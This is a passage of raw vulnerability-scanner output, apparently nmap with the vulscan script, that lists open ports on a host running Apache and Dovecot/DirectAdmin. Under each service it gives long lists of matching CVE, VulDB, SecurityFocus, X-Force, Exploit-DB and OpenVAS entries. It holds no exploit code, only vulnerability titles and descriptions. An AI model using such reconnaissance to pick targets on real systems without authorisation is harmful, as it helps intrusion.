10992| [100362] ISC BIND 9 DNSSEC Query Response Additional Section Remote Cache Poisoning Vulnerability
10993| [100251] ISC BIND 9 Remote Dynamic Update Message Denial of Service Vulnerability
10994| [63208] Fedora Core 9 FEDORA-2009-0350 (bind)
10995| [11226] Oracle 9iAS default error information disclosure
10996|
10997| SecurityTracker - https://www.securitytracker.com:
10998| [1025811] Cisco ASR 9000 Series Router IPv4 Packet Processing Flaw Lets Remote Users Deny Service
10999| [1012995] BIND 9 Validator Assumption Error May Let Remote Users Deny Service
11000| [1005048] Oracle Enterprise Manager Web Service Component of Oracle 9i Application Server Discloses the Web Cache Administrator Password to Local Users
11001| [1003675] Oracle 9iAS Application Server Discloses CGI-BIN Script Source Code to Remote Users
11002| [1001186] Microsoft Windows Me Operating System and Windows 98 with the Plus! 98 Package Disclose Data Compression Passwords
11003| [1028901] (McAfee Issues Advisory for McAfee Email Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11004| [1028900] (McAfee Issues Advisory for McAfee Email and Web Security Appliance) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11005| [1028899] (McAfee Issues Fix for McAfee Web Gateway) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11006| [1028866] (McAfee Issues Fix for McAfee Firewall Enterprise) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11007| [1028854] (NetBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11008| [1028849] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11009| [1028848] (Red Hat Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11010| [1028839] (FreeBSD Issues Fix) ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11011| [1028838] ISC BIND RDATA Processing Bug Lets Remote Users Deny Service
11012| [1028632] ISC BIND RUNTIME_CHECK Error Lets Remote Users Deny Service Against Recursive Resolvers
11013| [1028046] ISC BIND DNS64 and Response Policy Zones (RPZ) Bug Lets Remote Users Deny Service
11014| [1027835] ISC BIND DNS64 Bug Lets Remote Users Deny Service
11015| [1027642] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11016| [1027529] ISC BIND RDATA Processing Flaw Lets Remote Users Deny Service
11017| [1026647] ISC BIND Cache Update Policy Can Be Bypassed to Allow Revoked Domain Names to Remain Resolvable
11018| [1026335] ISC BIND Invalid Record Caching Flaw Lets Remote Users Deny Service
11019| [1025743] ISC BIND Response Policy Zones DNAME/CNAME Processing Flaw Lets Remote Users Deny Service
11020| [1025742] ISC BIND Packet Processing Flaw Lets Remote Users Deny Service
11021| [1015850] Samba winbindd Daemon Discloses Server Password to Local Users
11022| [1003359] BindView NETinventory Discloses Password to Local Users During Auditing
11023| [1001721] BIND Domain Name System Software May Disclose DNS Transactional Signature (TSIG) Keys to Local Users
11024|
11025| OSVDB - http://www.osvdb.org:
11026| [86219] Cardiac Science G3 Plus 9390A-501 AED AEDUpdate Cleartext Password Local Disclosure
11027| [22517] MPN HP-180W Wireless IP Phone UDP Port 9090 Information Disclosure
11028| [22516] ZyXEL P-2000W_v2 VoIP Wi-Fi Phone UDP Port 9090 Information Disclosure
11029| [21292] ZyXEL P2000W UDP 9090 Remote Information Disclosure
11030|_
1103180/tcp open ssl/http syn-ack Apache/2
11032|_http-server-header: Apache/2
11033|_http-trane-info: Problem with XML parsing of /evox/about
11034110/tcp open pop3 syn-ack Dovecot DirectAdmin pop3d
11035| vulscan: VulDB - https://vuldb.com:
11036| [134480] Dovecot up to 2.3.5.2 Submission-Login Crash denial of service
11037| [134479] Dovecot up to 2.3.5.2 IMAP Server Crash denial of service
11038| [134243] InfinitumIT DirectAdmin up to 1.561 FileManager CSRF privilege escalation
11039| [134024] Dovecot up to 2.3.5.1 JSON Encoder Username Crash denial of service
11040| [132543] Dovecot up to 2.2.36.0/2.3.4.0 Certificate Impersonation weak authentication
11041| [131477] JBMC DirectAdmin 1.55 /CMD_ACCOUNT_ADMIN cross site request forgery
11042| [119762] Dovecot up to 2.2.28 dict Authentication var_expand() denial of service
11043| [114012] Dovecot up to 2.2.33 TLS SNI Restart denial of service
11044| [114009] Dovecot SMTP Delivery Email Message Out-of-Bounds memory corruption
11045| [112447] Dovecot up to 2.2.33/2.3.0 SASL Auth Memory Leak denial of service
11046| [112266] JBMC DirectAdmin up to 1.51 email_ftp_password_change Setting memory corruption
11047| [106837] Dovecot up to 2.2.16 ssl-proxy-openssl.c ssl-proxy-opensslc denial of service
11048| [97052] Dovecot up to 2.2.26 auth-policy Unset Crash denial of service
11049| [95172] Directadmin Controlpanel 1.50.1 /CMD_SELECT_USERS cross site scripting
11050| [95100] DirectAdmin up to 1.50.1 Crash denial of service
11051| [69835] Dovecot 2.2.0/2.2.1 denial of service
11052| [13348] Dovecot up to 1.2.15/2.1.15 IMAP4/POP3 SSL/TLS Handshake denial of service
11053| [65684] Dovecot up to 2.2.6 unknown vulnerability
11054| [9807] Dovecot up to 1.2.7 on Exim Input Sanitizer privilege escalation
11055| [63692] Dovecot up to 2.0.15 spoofing
11056| [7062] Dovecot 2.1.10 mail-search.c denial of service
11057| [62578] DirectAdmin 1.403 cross site scripting
11058| [61198] Jbmc-software DirectAdmin 1.403 cross site scripting
11059| [57517] Dovecot up to 2.0.12 Login directory traversal
11060| [57516] Dovecot up to 2.0.12 Access Restriction directory traversal
11061| [57515] Dovecot up to 2.0.12 Crash denial of service
11062| [54944] Dovecot up to 1.2.14 denial of service
11063| [54943] Dovecot up to 1.2.14 Access Restriction Symlink privilege escalation
11064| [54942] Dovecot up to 2.0.4 Access Restriction denial of service
11065| [54941] Dovecot up to 2.0.4 Access Restriction unknown vulnerability
11066| [54840] Dovecot up to 1.2.12 AGate unknown vulnerability
11067| [53277] Dovecot up to 1.2.10 denial of service
11068| [50082] Dovecot up to 1.1.6 Stack-based memory corruption
11069| [48756] Jbmc-software DirectAdmin up to 1.292 cross site scripting
11070| [48060] Jbmc-software DirectAdmin up to 1.17 privilege escalation
11071| [45256] Dovecot up to 1.1.5 directory traversal
11072| [44846] Dovecot 1.1.4/1.1.5 IMAP Client Crash denial of service
11073| [44546] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11074| [44545] Dovecot up to 1.0.x Access Restriction unknown vulnerability
11075| [41430] Dovecot 1.0.12/1.1 Locking unknown vulnerability
11076| [40356] Dovecot 1.0.9 Cache unknown vulnerability
11077| [38747] DirectAdmin 1.30.2 cross site scripting
11078| [38222] Dovecot 1.0.2 directory traversal
11079| [37578] DirectAdmin 1.30.1 cross site scripting
11080| [36376] Dovecot up to 1.0.x directory traversal
11081| [36066] JBMC Software DirectAdmin 1.293 cross site scripting
11082| [35680] Jbmc Software DirectAdmin 1.293 cross site scripting
11083| [33341] JBMC Software DirectAdmin 1.28.1 cross site scripting
11084| [33332] Timo Sirainen Dovecot up to 1.0test53 Off-By-One memory corruption
11085| [30268] Timo Sirainen Dovecot 1.0/1.0 Beta2/1.0 Beta3/1.0 Beta7 directory traversal
11086| [30021] Jbmc Software DirectAdmin 1.26.6 cross site scripting
11087|
11088| MITRE CVE - https://cve.mitre.org:
11089| [CVE-2012-5305] Cross-site scripting (XSS) vulnerability in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
11090| [CVE-2012-3842] Multiple cross-site scripting (XSS) vulnerabilities in CMD_DOMAIN in JBMC Software DirectAdmin 1.403 allow remote authenticated users with certain privileges to inject arbitrary web script or HTML via the (1) select0 or (2) select8 parameters.
11091| [CVE-2011-5033] Stack-based buffer overflow in CFS.c in ConfigServer Security & Firewall (CSF) before 5.43, when running on a DirectAdmin server, allows local users to cause a denial of service (crash) via a long string in an admin.list file.
11092| [CVE-2011-4318] Dovecot 2.0.x before 2.0.16, when ssl or starttls is enabled and hostname is used to define the proxy destination, does not verify that the server hostname matches a domain name in the subject's Common Name (CN) of the X.509 certificate, which allows man-in-the-middle attackers to spoof SSL servers via a valid certificate for a different hostname.
11093| [CVE-2011-2167] script-login in Dovecot 2.0.x before 2.0.13 does not follow the chroot configuration setting, which might allow remote authenticated users to conduct directory traversal attacks by leveraging a script.
11094| [CVE-2011-2166] script-login in Dovecot 2.0.x before 2.0.13 does not follow the user and group configuration settings, which might allow remote authenticated users to bypass intended access restrictions by leveraging a script.
11095| [CVE-2011-1929] lib-mail/message-header-parser.c in Dovecot 1.2.x before 1.2.17 and 2.0.x before 2.0.13 does not properly handle '\0' characters in header names, which allows remote attackers to cause a denial of service (daemon crash or mailbox corruption) via a crafted e-mail message.
11096| [CVE-2010-4011] Dovecot in Apple Mac OS X 10.6.5 10H574 does not properly manage memory for user names, which allows remote authenticated users to read the private e-mail of other persons in opportunistic circumstances via standard e-mail clients accessing a user's own mailbox, related to a "memory aliasing issue."
11097| [CVE-2010-3780] Dovecot 1.2.x before 1.2.15 allows remote authenticated users to cause a denial of service (master process outage) by simultaneously disconnecting many (1) IMAP or (2) POP3 sessions.
11098| [CVE-2010-3779] Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.beta2 grants the admin permission to the owner of each mailbox in a non-public namespace, which might allow remote authenticated users to bypass intended access restrictions by changing the ACL of a mailbox, as demonstrated by a symlinked shared mailbox.
11099| [CVE-2010-3707] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving more specific entries that occur after less specific entries, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11100| [CVE-2010-3706] plugins/acl/acl-backend-vfile.c in Dovecot 1.2.x before 1.2.15 and 2.0.x before 2.0.5 interprets an ACL entry as a directive to add to the permissions granted by another ACL entry, instead of a directive to replace the permissions granted by another ACL entry, in certain circumstances involving the private namespace of a user, which allows remote authenticated users to bypass intended access restrictions via a request to read or modify a mailbox.
11101| [CVE-2010-3304] The ACL plugin in Dovecot 1.2.x before 1.2.13 propagates INBOX ACLs to newly created mailboxes in certain configurations, which might allow remote attackers to read mailboxes that have unintended weak ACLs.
11102| [CVE-2010-0745] Unspecified vulnerability in Dovecot 1.2.x before 1.2.11 allows remote attackers to cause a denial of service (CPU consumption) via long headers in an e-mail message.
11103| [CVE-2010-0535] Dovecot in Apple Mac OS X 10.6 before 10.6.3, when Kerberos is enabled, does not properly enforce the service access control list (SACL) for sending and receiving e-mail, which allows remote authenticated users to bypass intended access restrictions via unspecified vectors.
11104| [CVE-2010-0433] The kssl_keytab_is_available function in ssl/kssl.c in OpenSSL before 0.9.8n, when Kerberos is enabled but Kerberos configuration files cannot be opened, does not check a certain return value, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via SSL cipher negotiation, as demonstrated by a chroot installation of Dovecot or stunnel without Kerberos configuration files inside the chroot.
11105| [CVE-2009-3897] Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.
11106| [CVE-2009-3235] Multiple stack-based buffer overflows in the Sieve plugin in Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, as derived from Cyrus libsieve, allow context-dependent attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted SIEVE script, as demonstrated by forwarding an e-mail message to a large number of recipients, a different vulnerability than CVE-2009-2632.
11107| [CVE-2009-2632] Buffer overflow in the SIEVE script component (sieve/script.c), as used in cyrus-imapd in Cyrus IMAP Server 2.2.13 and 2.3.14, and Dovecot 1.0 before 1.0.4 and 1.1 before 1.1.7, allows local users to execute arbitrary code and read or modify arbitrary messages via a crafted SIEVE script, related to the incorrect use of the sizeof operator for determining buffer length, combined with an integer signedness error.
11108| [CVE-2009-2216] Cross-site scripting (XSS) vulnerability in CMD_REDIRECT in DirectAdmin 1.33.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the URI in a view=advanced request.
11109| [CVE-2009-1526] JBMC Software DirectAdmin before 1.334 allows local users to create or overwrite any file via a symlink attack on an arbitrary file in a certain temporary directory, related to a request for this temporary file in the PATH_INFO to the CMD_DB script during a backup action.
11110| [CVE-2009-1525] CMD_DB in JBMC Software DirectAdmin before 1.334 allows remote authenticated users to gain privileges via shell metacharacters in the name parameter during a restore action.
11111| [CVE-2008-5301] Directory traversal vulnerability in the ManageSieve implementation in Dovecot 1.0.15, 1.1, and 1.2 allows remote attackers to read and modify arbitrary .sieve files via a ".." (dot dot) in a script name.
11112| [CVE-2008-4907] The message parsing feature in Dovecot 1.1.4 and 1.1.5, when using the FETCH ENVELOPE command in the IMAP client, allows remote attackers to cause a denial of service (persistent crash) via an email with a malformed From address, which triggers an assertion error, aka "invalid message address parsing bug."
11113| [CVE-2008-4870] dovecot 1.0.7 in Red Hat Enterprise Linux (RHEL) 5, and possibly Fedora, uses world-readable permissions for dovecot.conf, which allows local users to obtain the ssl_key_password parameter value.
11114| [CVE-2008-4578] The ACL plugin in Dovecot before 1.1.4 allows attackers to bypass intended access restrictions by using the "k" right to create unauthorized "parent/child/child" mailboxes.
11115| [CVE-2008-4577] The ACL plugin in Dovecot before 1.1.4 treats negative access rights as if they are positive access rights, which allows attackers to bypass intended access restrictions.
11116| [CVE-2008-1218] Argument injection vulnerability in Dovecot 1.0.x before 1.0.13, and 1.1.x before 1.1.rc3, when using blocking passdbs, allows remote attackers to bypass the password check via a password containing TAB characters, which are treated as argument delimiters that enable the skip_password_check field to be specified.
11117| [CVE-2008-1199] Dovecot before 1.0.11, when configured to use mail_extra_groups to allow Dovecot to create dotlocks in /var/mail, might allow local users to read sensitive mail files for other users, or modify files or directories that are writable by group, via a symlink attack.
11118| [CVE-2007-6598] Dovecot before 1.0.10, with certain configuration options including use of %variables, does not properly maintain the LDAP+auth cache, which might allow remote authenticated users to login as a different user who has the same password.
11119| [CVE-2007-5794] Race condition in nss_ldap, when used in applications that are linked against the pthread library and fork after a call to nss_ldap, might send user data to the wrong process because of improper handling of the LDAP connection. NOTE: this issue was originally reported for Dovecot with the wrong mailboxes being returned, but other applications might also be affected.
11120| [CVE-2007-4830] Cross-site scripting (XSS) vulnerability in CMD_BANDWIDTH_BREAKDOWN in DirectAdmin 1.30.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the user parameter.
11121| [CVE-2007-4211] The ACL plugin in Dovecot before 1.0.3 allows remote authenticated users with the insert right to save certain flags via a (1) COPY or (2) APPEND command.
11122| [CVE-2007-3501] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin 1.30.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the domain parameter, a different vector than CVE-2007-1508.
11123| [CVE-2007-2231] Directory traversal vulnerability in index/mbox/mbox-storage.c in Dovecot before 1.0.rc29, when using the zlib plugin, allows remote attackers to read arbitrary gzipped (.gz) mailboxes (mbox files) via a .. (dot dot) sequence in the mailbox name.
11124| [CVE-2007-2173] Eval injection vulnerability in (1) courier-imapd.indirect and (2) courier-pop3d.indirect in Courier-IMAP before 4.0.6-r2, and 4.1.x before 4.1.2-r1, on Gentoo Linux allows remote attackers to execute arbitrary commands via the XMAILDIR variable, related to the LOGINRUN variable.
11125| [CVE-2007-1926] Cross-site scripting (XSS) vulnerability in JBMC Software DirectAdmin before 1.293 does not properly display log files, which allows remote authenticated users to inject arbitrary web script or HTML via (1) http or (2) ftp requests logged in /var/log/directadmin/security.log
11126| [CVE-2007-1508] Cross-site scripting (XSS) vulnerability in CMD_USER_STATS in DirectAdmin allows remote attackers to inject arbitrary web script or HTML via the RESULT parameter, a different vector than CVE-2006-5983.
11127| [CVE-2007-0618] Unspecified vulnerability in (1) pop3d, (2) pop3ds, (3) imapd, and (4) imapds in IBM AIX 5.3.0 has unspecified impact and attack vectors, involving an "authentication vulnerability."
11128| [CVE-2006-5983] Multiple cross-site scripting (XSS) vulnerabilities in JBMC Software DirectAdmin 1.28.1 allow remote authenticated users to inject arbitrary web script or HTML via the (1) user parameter to (a) CMD_SHOW_RESELLER or (b) CMD_SHOW_USER in the Admin level
11129| [CVE-2006-5973] Off-by-one buffer overflow in Dovecot 1.0test53 through 1.0.rc14, and possibly other versions, when index files are used and mmap_disable is set to "yes," allows remote authenticated IMAP or POP3 users to cause a denial of service (crash) via unspecified vectors involving the cache file.
11130| [CVE-2006-2502] Stack-based buffer overflow in pop3d in Cyrus IMAPD (cyrus-imapd) 2.3.2, when the popsubfolders option is enabled, allows remote attackers to execute arbitrary code via a long USER command.
11131| [CVE-2006-2414] Directory traversal vulnerability in Dovecot 1.0 beta and 1.0 allows remote attackers to list files and directories under the mbox parent directory and obtain mailbox names via ".." sequences in the (1) LIST or (2) DELETE IMAP command.
11132| [CVE-2006-2153] Cross-site scripting (XSS) vulnerability in HTM_PASSWD in DirectAdmin Hosting Management allows remote attackers to inject arbitrary web script or HTML via the domain parameter.
11133| [CVE-2006-0730] Multiple unspecified vulnerabilities in Dovecot before 1.0beta3 allow remote attackers to cause a denial of service (application crash or hang) via unspecified vectors involving (1) "potential hangs" in the APPEND command and "potential crashes" in (2) dovecot-auth and (3) imap/pop3-login. NOTE: vector 2 might be related to a double free vulnerability.
11134| [CVE-2002-0925] Format string vulnerability in mmsyslog function allows remote attackers to execute arbitrary code via (1) the USER command to mmpop3d for mmmail 0.0.13 and earlier, (2) the HELO command to mmsmtpd for mmmail 0.0.13 and earlier, or (3) the USER command to mmftpd 0.0.7 and earlier.
11135| [CVE-2001-0143] vpop3d program in linuxconf 1.23r and earlier allows local users to overwrite arbitrary files via a symlink attack.
11136| [CVE-2000-1197] POP2 or POP3 server (pop3d) in imap-uw IMAP package on FreeBSD and other operating systems creates lock files with predictable names, which allows local users to cause a denial of service (lack of mail access) for other users by creating lock files for other mail boxes.
11137| [CVE-1999-1445] Vulnerability in imapd and ipop3d in Slackware 3.4 and 3.3 with shadowing enabled, and possibly other operating systems, allows remote attackers to cause a core dump via a short sequence of USER and PASS commands that do not provide valid usernames or passwords.
11138|
11139| SecurityFocus - https://www.securityfocus.com/bid/:
11140| [103201] Dovecot CVE-2017-14461 Out-Of-Bounds Read Information Disclosure Vulnerability
11141| [97536] Dovecot CVE-2017-2669 Denial of Service Vulnerability
11142| [94639] Dovecot Auth Component CVE-2016-8652 Denial of Service Vulnerability
11143| [91175] Dovecot CVE-2016-4982 Local Information Disclosure Vulnerability
11144| [84736] Dovecot CVE-2008-4870 Local Security Vulnerability
11145| [83952] DirectAdmin CVE-2006-2153 Cross-Site Scripting Vulnerability
11146| [74335] Dovecot 'ssl-proxy-openssl.c' Remote Denial of Service Vulnerability
11147| [67306] Dovecot Denial of Service Vulnerability
11148| [67219] akpop3d 'pszQuery' Remote Memory Corruption Vulnerability
11149| [63911] Installatron Plugin for DirectAdmin Insecure Temporary File Creation Vulnerability
11150| [63373] Installatron Plugin for DirectAdmin cURL Output Remote Privilege Escalation Vulnerability
11151| [63367] Dovecot Checkpassword Authentication Protocol Local Authentication Bypass Vulnerability
11152| [62929] DirectAdmin Backup Multiple Security Vulnerabilities
11153| [61763] RETIRED: Dovecot 'LIST' Command Denial of Service Vulnerability
11154| [61017] DirectAdmin Symlink Attack Multiple Remote Privilege Escalation Vulnerabilities
11155| [60465] Exim for Dovecot 'use_shell' Remote Command Execution Vulnerability
11156| [60052] Dovecot 'APPEND' Parameter Denial of Service Vulnerability
11157| [56759] RETIRED: Dovecot 'mail-search.c' Denial of Service Vulnerability
11158| [53281] DirectAdmin Multiple Cross Site Scripting Vulnerabilities
11159| [52848] RETIRED: DirectAdmin 'CMD_DOMAIN' Cross-Site Scripting Vulnerability
11160| [52845] JBMC Software DirectAdmin 'domain' Parameter Cross Site Scripting Vulnerability
11161| [50709] Dovecot SSL Certificate 'Common Name' Field Validation Security Bypass Vulnerability
11162| [48003] Dovecot 'script-login' Multiple Security Bypass Vulnerabilities
11163| [47930] Dovecot Header Name NULL Character Denial of Service Vulnerability
11164| [47693] DirectAdmin 'mysql_backup' Folder Permissions Information Disclosure Vulnerability
11165| [47690] DirectAdmin Hard Link Local Privilege Escalation Vulnerability
11166| [44874] Apple Mac OS X Dovecot (CVE-2010-4011) Memory Corruption Vulnerability
11167| [43690] Dovecot Access Control List (ACL) Multiple Remote Vulnerabilities
11168| [41964] Dovecot Access Control List (ACL) Plugin Security Bypass Weakness
11169| [39838] tpop3d Remote Denial of Service Vulnerability
11170| [39258] Dovecot Service Control Access List Security Bypass Vulnerability
11171| [38721] DirectAdmin 'CMD_DB_VIEW' Cross-Site Scripting Vulnerability
11172| [37084] Dovecot Insecure 'base_dir' Permissions Local Privilege Escalation Vulnerability
11173| [36377] Dovecot Sieve Plugin Multiple Unspecified Buffer Overflow Vulnerabilities
11174| [35450] DirectAdmin 'CMD_REDIRECT' Cross-Site Scripting Vulnerability
11175| [34678] DirectAdmin '/CMD_DB' Restore Action Local Privilege Escalation Vulnerability
11176| [34676] DirectAdmin '/CMD_DB' Backup Action Insecure Temporary File Creation Vulnerability
11177| [32582] Dovecot ManageSieve Service '.sieve' Files Directory Traversal Vulnerability
11178| [31997] Dovecot Invalid Message Address Parsing Denial of Service Vulnerability
11179| [31587] Dovecot ACL Plugin Multiple Security Bypass Vulnerabilities
11180| [28181] Dovecot 'Tab' Character Password Check Security Bypass Vulnerability
11181| [28092] Dovecot 'mail_extra_groups' Insecure Settings Local Unauthorized Access Vulnerability
11182| [27093] Dovecot Authentication Cache Security Bypass Vulnerability
11183| [25607] DirectAdmin CMD_BANDWIDTH_BREAKDOWN Cross-Site Scripting Vulnerability
11184| [25182] Dovecot ACL Plugin Security Bypass Vulnerability
11185| [24688] DirectAdmin Domain Parameter Cross-Site Scripting Vulnerability
11186| [23552] Dovecot Zlib Plugin Remote Information Disclosure Vulnerability
11187| [23254] DirectAdmin Logfile HTML Injection Vulnerability
11188| [22996] DirectAdmin CMD_USER_STATS Cross-Site Scripting Vulnerability
11189| [22262] IBM AIX Pop3D/Pop3DS/IMapD/IMapDS Authentication Bypass Vulnerability
11190| [21183] Dovecot IMAP Server Mapped Pages Off-By-One Buffer Overflow Vulnerability
11191| [21049] DirectAdmin Multiple Cross-Site Scripting Vulnerabilities
11192| [18056] Cyrus IMAPD POP3D Remote Buffer Overflow Vulnerability
11193| [17961] Dovecot Remote Information Disclosure Vulnerability
11194| [16672] Dovecot Double Free Denial of Service Vulnerability
11195| [8495] akpop3d User Name SQL Injection Vulnerability
11196| [8473] Vpop3d Remote Denial Of Service Vulnerability
11197| [3990] ZPop3D Bad Login Logging Failure Vulnerability
11198| [2781] DynFX MailServer POP3d Denial of Service Vulnerability
11199|
11200| IBM X-Force - https://exchange.xforce.ibmcloud.com:
11201| [86382] Dovecot POP3 Service denial of service
11202| [85490] DirectAdmin Backup System email account functionality symlink
11203| [85488] DirectAdmin Backup System symlink
11204| [84396] Dovecot IMAP APPEND denial of service
11205| [80453] Dovecot mail-search.c denial of service
11206| [74569] DirectAdmin CMD_DOMAIN cross-site scripting
11207| [72685] DirectAdmin domain parameter cross-site request forgery
11208| [71354] Dovecot SSL Common Name (CN) weak security
11209| [67675] Dovecot script-login security bypass
11210| [67674] Dovecot script-login directory traversal
11211| [67589] Dovecot header name denial of service
11212| [67254] DirectAdmin MySQL information disclosure
11213| [67253] DirectAdmin hard link privilege escalation
11214| [63267] Apple Mac OS X Dovecot information disclosure
11215| [62340] Dovecot mailbox security bypass
11216| [62339] Dovecot IMAP or POP3 denial of service
11217| [62256] Dovecot mailbox security bypass
11218| [62255] Dovecot ACL entry security bypass
11219| [60639] Dovecot ACL plugin weak security
11220| [57267] Apple Mac OS X Dovecot Kerberos security bypass
11221| [56875] DirectAdmin name cross-site scripting
11222| [56763] Dovecot header denial of service
11223| [55181] DirectAdmin account cross-site request forgery
11224| [54363] Dovecot base_dir privilege escalation
11225| [53248] CMU Sieve plugin for Dovecot unspecified buffer overflow
11226| [51292] DirectAdmin CMD_REDIRECT cross-site scripting
11227| [50167] DirectAdmin CMD_DB command execution
11228| [49416] DirectAdmin CMD_DB backup action symlink
11229| [46323] Dovecot dovecot.conf information disclosure
11230| [46227] Dovecot message parsing denial of service
11231| [45669] Dovecot ACL mailbox security bypass
11232| [45667] Dovecot ACL plugin rights security bypass
11233| [41085] Dovecot TAB characters authentication bypass
11234| [41009] Dovecot mail_extra_groups option unauthorized access
11235| [39342] Dovecot LDAP auth cache configuration security bypass
11236| [36510] DirectAdmin user parameter cross-site scripting
11237| [35767] Dovecot ACL plugin security bypass
11238| [35177] DirectAdmin domain parameter cross-site scripting
11239| [34082] Dovecot mbox-storage.c directory traversal
11240| [33390] DirectAdmin log file cross-site scripting
11241| [33023] DirectAdmin CMD_USER_STATS form cross-site scripting
11242| [30433] Dovecot IMAP/POP3 server dovecot.index.cache buffer overflow
11243| [30256] DirectAdmin user, TYPE, and name parameters cross-site scripting
11244| [26578] Cyrus IMAP pop3d buffer overflow
11245| [26536] Dovecot IMAP LIST information disclosure
11246| [24710] Dovecot dovecot-auth and imap/pop3-login denial of service
11247| [24709] Dovecot APPEND command denial of service
11248| [13018] akpop3d authentication code SQL injection
11249| [7345] Slackware Linux imapd and ipop3d core dump
11250| [6269] imap, ipop2d and ipop3d buffer overflows
11251| [5923] Linuxconf vpop3d symbolic link
11252| [4918] IPOP3D, Buffer overflow attack
11253| [1560] IPOP3D, user login successful
11254| [1559] IPOP3D user login to remote host successful
11255| [1525] IPOP3D, user logout
11256| [1524] IPOP3D, user auto-logout
11257| [1523] IPOP3D, user login failure
11258| [1522] IPOP3D, brute force attack
11259| [1521] IPOP3D, user kiss of death logout
11260| [418] pop3d mktemp creates insecure temporary files
11261|
11262| Exploit-DB - https://www.exploit-db.com:
11263| [29747] DirectAdmin 1.292 CMD_USER_STATS Cross-Site Scripting Vulnerability
11264| [29006] DirectAdmin 1.28/1.29 CMD_FTP_SHOW DOMAIN Parameter XSS
11265| [29005] DirectAdmin 1.28/1.29 CMD_EMAIL_LIST name Parameter XSS
11266| [29004] DirectAdmin 1.28/1.29 CMD_EMAIL_VACATION_MODIFY user Parameter XSS
11267| [29003] DirectAdmin 1.28/1.29 CMD_TICKET type Parameter XSS
11268| [29002] DirectAdmin 1.28/1.29 CMD_EMAIL_FORWARDER_MODIFY user Parameter XSS
11269| [29001] DirectAdmin 1.28/1.29 CMD_TICKET_CREATE TYPE Parameter XSS
11270| [29000] DirectAdmin 1.28/1.29 CMD_SHOW_USER user Parameter XSS
11271| [28999] DirectAdmin 1.28/1.29 CMD_SHOW_RESELLER user Parameter XSS
11272| [25297] Dovecot with Exim sender_address Parameter - Remote Command Execution
11273| [23053] Vpop3d Remote Denial of Service Vulnerability
11274| [16836] Cyrus IMAPD pop3d popsubfolders USER Buffer Overflow
11275| [11893] tPop3d 1.5.3 DoS
11276| [11813] DirectAdmin 1.34.4 - Multi CSRF vulnerability
11277| [11029] DirectAdmin <= 1.33.6 Symlink Permission Bypass
11278| [10779] DirectAdmin 1.34.0 - CSRF Create Administrator Vulnerability
11279| [5257] Dovecot IMAP 1.0.10 <= 1.1rc2 - Remote Email Disclosure Exploit
11280| [2185] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (3)
11281| [2053] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit (2)
11282| [1813] Cyrus IMAPD 2.3.2 (pop3d) Remote Buffer Overflow Exploit
11283|
11284| OpenVAS (Nessus) - http://www.openvas.org:
11285| [901026] Dovecot Sieve Plugin Multiple Buffer Overflow Vulnerabilities
11286| [901025] Dovecot Version Detection
11287| [881402] CentOS Update for dovecot CESA-2011:1187 centos5 x86_64
11288| [881358] CentOS Update for dovecot CESA-2011:1187 centos4 x86_64
11289| [880980] CentOS Update for dovecot CESA-2011:1187 centos5 i386
11290| [880967] CentOS Update for dovecot CESA-2011:1187 centos4 i386
11291| [870607] RedHat Update for dovecot RHSA-2011:0600-01
11292| [870471] RedHat Update for dovecot RHSA-2011:1187-01
11293| [870153] RedHat Update for dovecot RHSA-2008:0297-02
11294| [863272] Fedora Update for dovecot FEDORA-2011-7612
11295| [863115] Fedora Update for dovecot FEDORA-2011-7258
11296| [861525] Fedora Update for dovecot FEDORA-2007-664
11297| [861394] Fedora Update for dovecot FEDORA-2007-493
11298| [861333] Fedora Update for dovecot FEDORA-2007-1485
11299| [860845] Fedora Update for dovecot FEDORA-2008-9202
11300| [860663] Fedora Update for dovecot FEDORA-2008-2475
11301| [860169] Fedora Update for dovecot FEDORA-2008-2464
11302| [860089] Fedora Update for dovecot FEDORA-2008-9232
11303| [840950] Ubuntu Update for dovecot USN-1295-1
11304| [840668] Ubuntu Update for dovecot USN-1143-1
11305| [840583] Ubuntu Update for dovecot vulnerabilities USN-1059-1
11306| [840335] Ubuntu Update for dovecot vulnerabilities USN-593-1
11307| [840290] Ubuntu Update for dovecot vulnerability USN-567-1
11308| [840234] Ubuntu Update for dovecot vulnerability USN-666-1
11309| [840072] Ubuntu Update for dovecot vulnerability USN-487-1
11310| [831405] Mandriva Update for dovecot MDVSA-2011:101 (dovecot)
11311| [831230] Mandriva Update for dovecot MDVSA-2010:217 (dovecot)
11312| [831197] Mandriva Update for dovecot MDVSA-2010:196 (dovecot)
11313| [831054] Mandriva Update for dovecot MDVSA-2010:104 (dovecot)
11314| [830496] Mandriva Update for dovecot MDVSA-2008:232 (dovecot)
11315| [801055] Dovecot 'base_dir' Insecure Permissions Security Bypass Vulnerability
11316| [800030] Dovecot ACL Plugin Security Bypass Vulnerabilities
11317| [70767] Gentoo Security Advisory GLSA 201110-04 (Dovecot)
11318| [70259] FreeBSD Ports: dovecot
